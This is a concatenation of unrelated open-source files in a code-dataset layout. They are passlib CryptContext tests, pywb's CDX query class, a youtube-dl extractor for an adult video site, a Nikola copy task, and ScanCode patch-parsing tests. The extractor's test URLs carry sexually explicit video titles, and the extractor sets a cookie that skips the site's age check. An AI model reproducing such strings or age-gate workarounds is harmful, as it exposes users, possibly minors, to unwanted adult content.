self.assertRaises(TypeError, CryptContext, "sha256_crypt", all__min_rounds=bad)
self.assertRaises(TypeError, CryptContext, "sha256_crypt", all__max_rounds=bad)
self.assertRaises(TypeError, CryptContext, "sha256_crypt", all__vary_rounds=bad)
self.assertRaises(TypeError, CryptContext, "sha256_crypt", all__default_rounds=bad)
def test_51_linear_vary_rounds(self):
"""test linear vary rounds"""
cc = CryptContext(schemes=["sha256_crypt"],
all__min_rounds=1995,
all__max_rounds=2005,
all__default_rounds=2000,
)
# test negative
self.assertRaises(ValueError, cc.copy, all__vary_rounds=-1)
self.assertRaises(ValueError, cc.copy, all__vary_rounds="-1%")
self.assertRaises(ValueError, cc.copy, all__vary_rounds="101%")
# test static
c2 = cc.copy(all__vary_rounds=0)
self.assert_rounds_range(c2, "sha256_crypt", 2000, 2000)
c2 = cc.copy(all__vary_rounds="0%")
self.assert_rounds_range(c2, "sha256_crypt", 2000, 2000)
# test absolute
c2 = cc.copy(all__vary_rounds=1)
self.assert_rounds_range(c2, "sha256_crypt", 1999, 2001)
c2 = cc.copy(all__vary_rounds=100)
self.assert_rounds_range(c2, "sha256_crypt", 1995, 2005)
# test relative
c2 = cc.copy(all__vary_rounds="0.1%")
self.assert_rounds_range(c2, "sha256_crypt", 1998, 2002)
c2 = cc.copy(all__vary_rounds="100%")
self.assert_rounds_range(c2, "sha256_crypt", 1995, 2005)
def test_52_log2_vary_rounds(self):
"""test log2 vary rounds"""
cc = CryptContext(schemes=["bcrypt"],
all__min_rounds=15,
all__max_rounds=25,
all__default_rounds=20,
)
# test negative
self.assertRaises(ValueError, cc.copy, all__vary_rounds=-1)
self.assertRaises(ValueError, cc.copy, all__vary_rounds="-1%")
self.assertRaises(ValueError, cc.copy, all__vary_rounds="101%")
# test static
c2 = cc.copy(all__vary_rounds=0)
self.assert_rounds_range(c2, "bcrypt", 20, 20)
c2 = cc.copy(all__vary_rounds="0%")
self.assert_rounds_range(c2, "bcrypt", 20, 20)
# test absolute
c2 = cc.copy(all__vary_rounds=1)
self.assert_rounds_range(c2, "bcrypt", 19, 21)
c2 = cc.copy(all__vary_rounds=100)
self.assert_rounds_range(c2, "bcrypt", 15, 25)
# test relative - should shift over at 50% mark
c2 = cc.copy(all__vary_rounds="1%")
self.assert_rounds_range(c2, "bcrypt", 20, 20)
c2 = cc.copy(all__vary_rounds="49%")
self.assert_rounds_range(c2, "bcrypt", 20, 20)
c2 = cc.copy(all__vary_rounds="50%")
self.assert_rounds_range(c2, "bcrypt", 19, 20)
c2 = cc.copy(all__vary_rounds="100%")
self.assert_rounds_range(c2, "bcrypt", 15, 21)
def assert_rounds_range(self, context, scheme, lower, upper):
"""helper to check vary_rounds covers specified range"""
# NOTE: this runs enough times that the min and max *should* be hit,
# though there's a faint chance it will randomly fail.
handler = context.handler(scheme)
salt = handler.default_salt_chars[0:1] * handler.max_salt_size
seen = set()
for i in irange(300):
h = context.genconfig(scheme, salt=salt)
r = handler.from_string(h).rounds
seen.add(r)
self.assertEqual(min(seen), lower, "vary_rounds had wrong lower limit:")
self.assertEqual(max(seen), upper, "vary_rounds had wrong upper limit:")
#===================================================================
# feature tests
#===================================================================
def test_60_min_verify_time(self):
"""test verify() honors min_verify_time"""
delta = .05
if TICK_RESOLUTION >= delta/10:
raise self.skipTest("timer not accurate enough")
min_delay = 2*delta
min_verify_time = 5*delta
max_delay = 8*delta
class TimedHash(uh.StaticHandler):
"""psuedo hash that takes specified amount of time"""
name = "timed_hash"
delay = 0
@classmethod
def identify(cls, hash):
return True
def _calc_checksum(self, secret):
quicksleep(self.delay)
return to_unicode(secret + 'x')
# check mvt issues a warning, and then filter for remainder of test
with self.assertWarningList(["'min_verify_time' is deprecated"]*2):
cc = CryptContext([TimedHash], min_verify_time=min_verify_time,
admin__context__min_verify_time=min_verify_time*2)
warnings.filterwarnings("ignore", "'min_verify_time' is deprecated")
def timecall(func, *args, **kwds):
start = tick()
result = func(*args, **kwds)
return tick()-start, result
# verify genhash delay works
TimedHash.delay = min_delay
elapsed, result = timecall(TimedHash.genhash, 'stub', None)
self.assertEqual(result, 'stubx')
self.assertAlmostEqual(elapsed, min_delay, delta=delta)
# ensure min verify time is honored
# correct password
elapsed, result = timecall(cc.verify, "stub", "stubx")
self.assertTrue(result)
self.assertAlmostEqual(elapsed, min_delay, delta=delta)
# incorrect password
elapsed, result = timecall(cc.verify, "blob", "stubx")
self.assertFalse(result)
self.assertAlmostEqual(elapsed, min_verify_time, delta=delta)
# incorrect password w/ special category setting
elapsed, result = timecall(cc.verify, "blob", "stubx", category="admin")
self.assertFalse(result)
self.assertAlmostEqual(elapsed, min_verify_time*2, delta=delta)
# ensure taking longer emits a warning.
TimedHash.delay = max_delay
with self.assertWarningList(".*verify exceeded min_verify_time"):
elapsed, result = timecall(cc.verify, "blob", "stubx")
self.assertFalse(result)
self.assertAlmostEqual(elapsed, max_delay, delta=delta)
# reject values < 0
self.assertRaises(ValueError, CryptContext, min_verify_time=-1)
def test_61_autodeprecate(self):
"""test deprecated='auto' is handled correctly"""
def getstate(ctx, category=None):
return [ctx._is_deprecated_scheme(scheme, category) for scheme in ctx.schemes()]
# correctly reports default
ctx = CryptContext("sha256_crypt,md5_crypt,des_crypt", deprecated="auto")
self.assertEqual(getstate(ctx, None), [False, True, True])
self.assertEqual(getstate(ctx, "admin"), [False, True, True])
# correctly reports changed default
ctx.update(default="md5_crypt")
self.assertEqual(getstate(ctx, None), [True, False, True])
self.assertEqual(getstate(ctx, "admin"), [True, False, True])
# category default is handled correctly
ctx.update(admin__context__default="des_crypt")
self.assertEqual(getstate(ctx, None), [True, False, True])
self.assertEqual(getstate(ctx, "admin"), [True, True, False])
# handles 1 scheme
ctx = CryptContext(["sha256_crypt"], deprecated="auto")
self.assertEqual(getstate(ctx, None), [False])
self.assertEqual(getstate(ctx, "admin"), [False])
# disallow auto & other deprecated schemes at same time.
self.assertRaises(ValueError, CryptContext, "sha256_crypt,md5_crypt",
deprecated="auto,md5_crypt")
self.assertRaises(ValueError, CryptContext, "sha256_crypt,md5_crypt",
deprecated="md5_crypt,auto")
#===================================================================
# handler deprecation detectors
#===================================================================
def test_62_bcrypt_update(self):
"""test verify_and_update / needs_update corrects bcrypt padding"""
# see issue 25.
bcrypt = hash.bcrypt
PASS1 = "test"
BAD1 = "$2a$04$yjDgE74RJkeqC0/1NheSScrvKeu9IbKDpcQf/Ox3qsrRS/Kw42qIS"
GOOD1 = "$2a$04$yjDgE74RJkeqC0/1NheSSOrvKeu9IbKDpcQf/Ox3qsrRS/Kw42qIS"
ctx = CryptContext(["bcrypt"], bcrypt__rounds=4)
self.assertTrue(ctx.needs_update(BAD1))
self.assertFalse(ctx.needs_update(GOOD1))
if bcrypt.has_backend():
self.assertEqual(ctx.verify_and_update(PASS1,GOOD1), (True,None))
with self.assertWarningList(["incorrect.*padding bits"]*2):
self.assertEqual(ctx.verify_and_update("x",BAD1), (False,None))
ok, new_hash = ctx.verify_and_update(PASS1, BAD1)
self.assertTrue(ok)
self.assertTrue(new_hash and new_hash != BAD1)
def test_63_bsdi_crypt_update(self):
"""test verify_and_update / needs_update corrects bsdi even rounds"""
even_hash = '_Y/../cG0zkJa6LY6k4c'
odd_hash = '_Z/..TgFg0/ptQtpAgws'
secret = 'test'
ctx = CryptContext(['bsdi_crypt'], bsdi_crypt__min_rounds=5)
self.assertTrue(ctx.needs_update(even_hash))
self.assertFalse(ctx.needs_update(odd_hash))
self.assertEqual(ctx.verify_and_update(secret, odd_hash), (True,None))
self.assertEqual(ctx.verify_and_update("x", even_hash), (False,None))
ok, new_hash = ctx.verify_and_update(secret, even_hash)
self.assertTrue(ok)
self.assertTrue(new_hash and new_hash != even_hash)
#===================================================================
# eoc
#===================================================================
#=============================================================================
# LazyCryptContext
#=============================================================================
class dummy_2(uh.StaticHandler):
name = "dummy_2"
class LazyCryptContextTest(TestCase):
descriptionPrefix = "LazyCryptContext"
def setUp(self):
# make sure the handler isn't registered before the test, and unregister it afterwards
unload_handler_name("dummy_2")
self.addCleanup(unload_handler_name, "dummy_2")
def test_kwd_constructor(self):
"""test plain kwds"""
self.assertFalse(has_crypt_handler("dummy_2"))
register_crypt_handler_path("dummy_2", "passlib.tests.test_context")
cc = LazyCryptContext(iter(["dummy_2", "des_crypt"]), deprecated=["des_crypt"])
self.assertFalse(has_crypt_handler("dummy_2", True))
self.assertEqual(cc.schemes(), ("dummy_2", "des_crypt"))
self.assertTrue(cc._is_deprecated_scheme("des_crypt"))
self.assertTrue(has_crypt_handler("dummy_2", True))
def test_callable_constructor(self):
"""test construction via an onload() callable returning kwds"""
self.assertFalse(has_crypt_handler("dummy_2"))
register_crypt_handler_path("dummy_2", "passlib.tests.test_context")
def onload(flag=False):
self.assertTrue(flag)
return dict(schemes=iter(["dummy_2", "des_crypt"]), deprecated=["des_crypt"])
cc = LazyCryptContext(onload=onload, flag=True)
self.assertFalse(has_crypt_handler("dummy_2", True))
self.assertEqual(cc.schemes(), ("dummy_2", "des_crypt"))
self.assertTrue(cc._is_deprecated_scheme("des_crypt"))
self.assertTrue(has_crypt_handler("dummy_2", True))
#=============================================================================
# eof
#=============================================================================
| mit |
ikreymer/pywb | pywb/warcserver/index/query.py | 1 | 3663 | from six.moves.urllib.parse import urlencode
from pywb.warcserver.index.cdxobject import CDXException
from pywb.utils.canonicalize import calc_search_range
from pywb.utils.format import to_bool
#=================================================================
class CDXQuery(object):
def __init__(self, params):
self.params = params
alt_url = self.params.get('alt_url')
url = alt_url or self.url
if not self.params.get('matchType'):
if url.startswith('*.'):
url = self.params['url'] = url[2:]
self.params['matchType'] = 'domain'
elif url.endswith('*'):
url = self.params['url'] = url[:-1]
self.params['matchType'] = 'prefix'
else:
self.params['matchType'] = 'exact'
if alt_url:
self.params['alt_url'] = url
start, end = calc_search_range(url=url,
match_type=self.params['matchType'],
url_canon=self.params.get('_url_canon'))
self.params['key'] = start.encode('utf-8')
self.params['end_key'] = end.encode('utf-8')
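# e.g. url='*.example.com'        -> matchType='domain', url='example.com'
#      url='http://a.com/path*'   -> matchType='prefix', url='http://a.com/path'
#      anything else              -> matchType='exact'
# key/end_key bound the CDX index scan for the canonicalized url range.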
@property
def key(self):
return self.params['key']
@property
def end_key(self):
return self.params['end_key']
def set_key(self, key, end_key):
self.params['key'] = key
self.params['end_key'] = end_key
@property
def url(self):
try:
return self.params['url']
except KeyError:
msg = 'A url= param must be specified to query the cdx server'
raise CDXException(msg)
@property
def match_type(self):
return self.params.get('matchType', 'exact')
@property
def is_exact(self):
return self.match_type == 'exact'
@property
def allow_fuzzy(self):
return self._get_bool('allowFuzzy')
@property
def output(self):
return self.params.get('output', 'text')
@property
def limit(self):
return int(self.params.get('limit', 100000))
@property
def collapse_time(self):
return self.params.get('collapseTime')
@property
def resolve_revisits(self):
return self._get_bool('resolveRevisits')
@property
def filters(self):
return self.params.get('filter', [])
@property
def fields(self):
v = self.params.get('fields')
# fall back to the legacy 'fl' param name
if not v:
v = self.params.get('fl')
return v.split(',') if v else None
@property
def from_ts(self):
return self.params.get('from') or self.params.get('from_ts')
@property
def to_ts(self):
return self.params.get('to')
@property
def closest(self):
# a 'closest' timestamp may be passed on its own; sort=closest is not required
return self.params.get('closest')
@property
def reverse(self):
# sort=reverse overrides reverse=0
return (self._get_bool('reverse') or
self.params.get('sort') == 'reverse')
@property
def custom_ops(self):
return self.params.get('custom_ops', [])
@property
def secondary_index_only(self):
return self._get_bool('showPagedIndex')
@property
def page(self):
return int(self.params.get('page', 0))
@property
def page_size(self):
return self.params.get('pageSize')
@property
def page_count(self):
return self._get_bool('showNumPages')
def _get_bool(self, name):
v = self.params.get(name)
return to_bool(v)
def urlencode(self):
return urlencode(self.params, True)
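# --- hedged usage sketch (param names follow the properties above):
#   q = CDXQuery({'url': 'http://example.com/path*', 'limit': '10'})
#   q.match_type   # 'prefix' (inferred from the trailing '*')
#   q.limit        # 10
#   q.urlencode()  # query string including the computed key/end_key range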
| gpl-3.0 |
daineseh/kodi-plugin.video.ted-talks-chinese | youtube_dl/extractor/extremetube.py | 31 | 3146 | from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
int_or_none,
sanitized_Request,
str_to_int,
)
class ExtremeTubeIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?extremetube\.com/(?:[^/]+/)?video/(?P<id>[^/#?&]+)'
_TESTS = [{
'url': 'http://www.extremetube.com/video/music-video-14-british-euro-brit-european-cumshots-swallow-652431',
'md5': '344d0c6d50e2f16b06e49ca011d8ac69',
'info_dict': {
'id': 'music-video-14-british-euro-brit-european-cumshots-swallow-652431',
'ext': 'mp4',
'title': 'Music Video 14 british euro brit european cumshots swallow',
'uploader': 'unknown',
'view_count': int,
'age_limit': 18,
}
}, {
'url': 'http://www.extremetube.com/gay/video/abcde-1234',
'only_matching': True,
}, {
'url': 'http://www.extremetube.com/video/latina-slut-fucked-by-fat-black-dick',
'only_matching': True,
}, {
'url': 'http://www.extremetube.com/video/652431',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
req = sanitized_Request(url)
req.add_header('Cookie', 'age_verified=1')
webpage = self._download_webpage(req, video_id)
video_title = self._html_search_regex(
r'<h1 [^>]*?title="([^"]+)"[^>]*>', webpage, 'title')
uploader = self._html_search_regex(
r'Uploaded by:\s*</strong>\s*(.+?)\s*</div>',
webpage, 'uploader', fatal=False)
view_count = str_to_int(self._html_search_regex(
r'Views:\s*</strong>\s*<span>([\d,\.]+)</span>',
webpage, 'view count', fatal=False))
flash_vars = self._parse_json(
self._search_regex(
r'var\s+flashvars\s*=\s*({.+?});', webpage, 'flash vars'),
video_id)
formats = []
for quality_key, video_url in flash_vars.items():
height = int_or_none(self._search_regex(
r'quality_(\d+)[pP]$', quality_key, 'height', default=None))
if not height:
continue
f = {
'url': video_url,
}
mobj = re.search(
r'/(?P<height>\d{3,4})[pP]_(?P<bitrate>\d+)[kK]_\d+', video_url)
if mobj:
height = int(mobj.group('height'))
bitrate = int(mobj.group('bitrate'))
f.update({
'format_id': '%dp-%dk' % (height, bitrate),
'height': height,
'tbr': bitrate,
})
else:
f.update({
'format_id': '%dp' % height,
'height': height,
})
formats.append(f)
self._sort_formats(formats)
return {
'id': video_id,
'title': video_title,
'formats': formats,
'uploader': uploader,
'view_count': view_count,
'age_limit': 18,
}
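# --- illustration of the format mapping above (hypothetical flashvars entry):
#   'quality_720p': 'http://cdn.example/.../720P_1500K_123.mp4'
#   -> height=720, bitrate=1500 -> format_id='720p-1500k', tbr=1500
# entries whose URL carries no embedded bitrate fall back to format_id='720p'.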
| gpl-2.0 |
kotnik/nikola | nikola/plugins/task_copy_files.py | 3 | 2203 | # -*- coding: utf-8 -*-
# Copyright © 2012-2013 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os
from nikola.plugin_categories import Task
from nikola import utils
class CopyFiles(Task):
"""Copy static files into the output folder."""
name = "copy_files"
def gen_tasks(self):
"""Copy static files into the output folder."""
kw = {
'files_folders': self.site.config['FILES_FOLDERS'],
'output_folder': self.site.config['OUTPUT_FOLDER'],
'filters': self.site.config['FILTERS'],
}
flag = False
for src in kw['files_folders']:
dst = kw['output_folder']
filters = kw['filters']
real_dst = os.path.join(dst, kw['files_folders'][src])
for task in utils.copy_tree(src, real_dst, link_cutoff=dst):
flag = True
task['basename'] = self.name
task['uptodate'] = [utils.config_changed(kw)]
yield utils.apply_filters(task, filters)
if not flag:
yield {
'basename': self.name,
'actions': (),
}
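# --- hedged config sketch: the FILES_FOLDERS setting this task consumes maps
# source folders to output-relative destinations, e.g. in a site's conf.py:
#   FILES_FOLDERS = {'files': ''}        # copy ./files/* into output/
#   FILES_FOLDERS = {'extra': 'static'}  # copy ./extra/* into output/static/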
| mit |
yashdsaraf/scancode-toolkit | tests/extractcode/test_patch.py | 1 | 72541 | #
# Copyright (c) 2017 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import codecs
import json
import os
from unittest.case import expectedFailure
from commoncode.testcase import FileBasedTesting
from commoncode.text import as_unicode
from extractcode import patch
class TestIsPatch(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_is_not_patch(self):
test_dir = self.get_test_loc('patch/not_patches', copy=True)
for r, _, files in os.walk(test_dir):
for f in files:
test_file = os.path.join(r, f)
assert not patch.is_patch(test_file)
def test_is_patch(self):
test_dir = self.get_test_loc('patch/patches', copy=True)
for r, _, files in os.walk(test_dir):
for f in files:
if not f.endswith('expected'):
test_file = os.path.join(r, f)
assert patch.is_patch(test_file)
def check_patch(test_file, expected_file, regen=False):
result = [list(pi) for pi in patch.patch_info(test_file)]
result = [[as_unicode(s), as_unicode(t), map(as_unicode, lines)]
for s, t, lines in result]
if regen:
with codecs.open(expected_file, 'wb', encoding='utf-8') as regened:
json.dump(result, regened, indent=2)
with codecs.open(expected_file, 'rb', encoding='utf-8') as expect:
expected = json.load(expect)
assert expected == result
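# patch.patch_info() yields (source_path, target_path, hunk_lines) triples;
# to (re)generate an expected-JSON fixture, call with regen=True, e.g.:
#   check_patch(test_file, expected_file, regen=True)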
class TestPatchInfoFailing(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
# FIXME: these tests need love and eventually a bug report upstream
@expectedFailure
def test_patch_info_patch_patches_misc_webkit_opensource_patches_sync_xhr_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/sync_xhr.patch')
# fails with Exception Unable to parse patch file
list(patch.patch_info(test_file))
@expectedFailure
def test_patch_info_patch_patches_problematic_opensso_patch(self):
test_file = self.get_test_loc(u'patch/patches/problematic/OpenSSO.patch')
# fails with Exception Unable to parse patch file
list(patch.patch_info(test_file))
class TestPatchInfo(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_patch_info_patch_patches_dnsmasq_2_63_1_diff(self):
test_file = self.get_test_loc(u'patch/patches/dnsmasq_2.63-1.diff')
expected_file = self.get_test_loc('patch/patches/dnsmasq_2.63-1.diff.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_dropbear_2012_55_1_diff(self):
test_file = self.get_test_loc(u'patch/patches/dropbear_2012.55-1.diff')
expected_file = self.get_test_loc('patch/patches/dropbear_2012.55-1.diff.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_electricfence_2_0_5_longjmp_patch(self):
test_file = self.get_test_loc(u'patch/patches/ElectricFence-2.0.5-longjmp.patch')
expected_file = self.get_test_loc('patch/patches/ElectricFence-2.0.5-longjmp.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_electricfence_2_1_vaarg_patch(self):
test_file = self.get_test_loc(u'patch/patches/ElectricFence-2.1-vaarg.patch')
expected_file = self.get_test_loc('patch/patches/ElectricFence-2.1-vaarg.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_electricfence_2_2_2_madvise_patch(self):
test_file = self.get_test_loc(u'patch/patches/ElectricFence-2.2.2-madvise.patch')
expected_file = self.get_test_loc('patch/patches/ElectricFence-2.2.2-madvise.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_electricfence_2_2_2_pthread_patch(self):
test_file = self.get_test_loc(u'patch/patches/ElectricFence-2.2.2-pthread.patch')
expected_file = self.get_test_loc('patch/patches/ElectricFence-2.2.2-pthread.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_libmediainfo_0_7_43_diff(self):
test_file = self.get_test_loc(u'patch/patches/libmediainfo-0.7.43.diff')
expected_file = self.get_test_loc('patch/patches/libmediainfo-0.7.43.diff.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_avahi_0_6_25_patches_configure_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/avahi-0.6.25/patches/configure.patch')
expected_file = self.get_test_loc('patch/patches/misc/avahi-0.6.25/patches/configure.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_avahi_0_6_25_patches_main_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/avahi-0.6.25/patches/main.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/avahi-0.6.25/patches/main.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_busybox_patches_fix_subarch_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/busybox/patches/fix-subarch.patch')
expected_file = self.get_test_loc('patch/patches/misc/busybox/patches/fix-subarch.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_busybox_patches_gtrick_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/busybox/patches/gtrick.patch')
expected_file = self.get_test_loc('patch/patches/misc/busybox/patches/gtrick.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_busybox_patches_workaround_old_uclibc_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/busybox/patches/workaround_old_uclibc.patch')
expected_file = self.get_test_loc('patch/patches/misc/busybox/patches/workaround_old_uclibc.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_curl_patches_ekioh_cookie_fix_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/curl/patches/ekioh_cookie_fix.patch')
expected_file = self.get_test_loc('patch/patches/misc/curl/patches/ekioh_cookie_fix.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_e2fsprogs_1_37_uuidlibs_blkidlibs_only_target_makefile_in_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/e2fsprogs-1.37/uuidlibs_blkidlibs_only_target_Makefile.in.patch')
expected_file = self.get_test_loc('patch/patches/misc/e2fsprogs-1.37/uuidlibs_blkidlibs_only_target_Makefile.in.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_ekioh_svg_opensource_patches_patch_ekioh_config_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/ekioh-svg/opensource/patches/patch_ekioh_config.patch')
expected_file = self.get_test_loc('patch/patches/misc/ekioh-svg/opensource/patches/patch_ekioh_config.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_accelerated_blit_webcore_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/accelerated_blit_webcore.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/accelerated_blit_webcore.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_accelerated_blit_webkit_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/accelerated_blit_webkit.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/accelerated_blit_webkit.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_animated_gif_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/animated_gif.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/animated_gif.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_computed_style_for_transform_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/computed_style_for_transform.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/computed_style_for_transform.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_cookies_fixes_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/cookies_fixes.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/cookies_fixes.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_dlna_image_security_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/dlna_image_security.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/dlna_image_security.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_draw_pattern_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/draw_pattern.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/draw_pattern.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_enable_logs_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/enable_logs.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/enable_logs.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_enable_proxy_setup_log_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/enable_proxy_setup_log.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/enable_proxy_setup_log.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_file_secure_mode_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/file_secure_mode.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/file_secure_mode.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_http_secure_mode_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/http_secure_mode.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/http_secure_mode.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_javascript_screen_resolution_fix_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/javascript_screen_resolution_fix.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/javascript_screen_resolution_fix.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_keycode_webkit_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/keycode_webkit.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/keycode_webkit.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_local_file_access_whitelist_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/local_file_access_whitelist.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/local_file_access_whitelist.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_lower_case_css_attributes_for_transform_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/lower_case_css_attributes_for_transform.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/lower_case_css_attributes_for_transform.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_moving_empty_image_leaves_garbage_on_screen_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/moving_empty_image_leaves_garbage_on_screen.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/moving_empty_image_leaves_garbage_on_screen.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_open_in_new_window_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/open_in_new_window.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/open_in_new_window.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_plugin_thread_async_call_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/plugin_thread_async_call.patch')
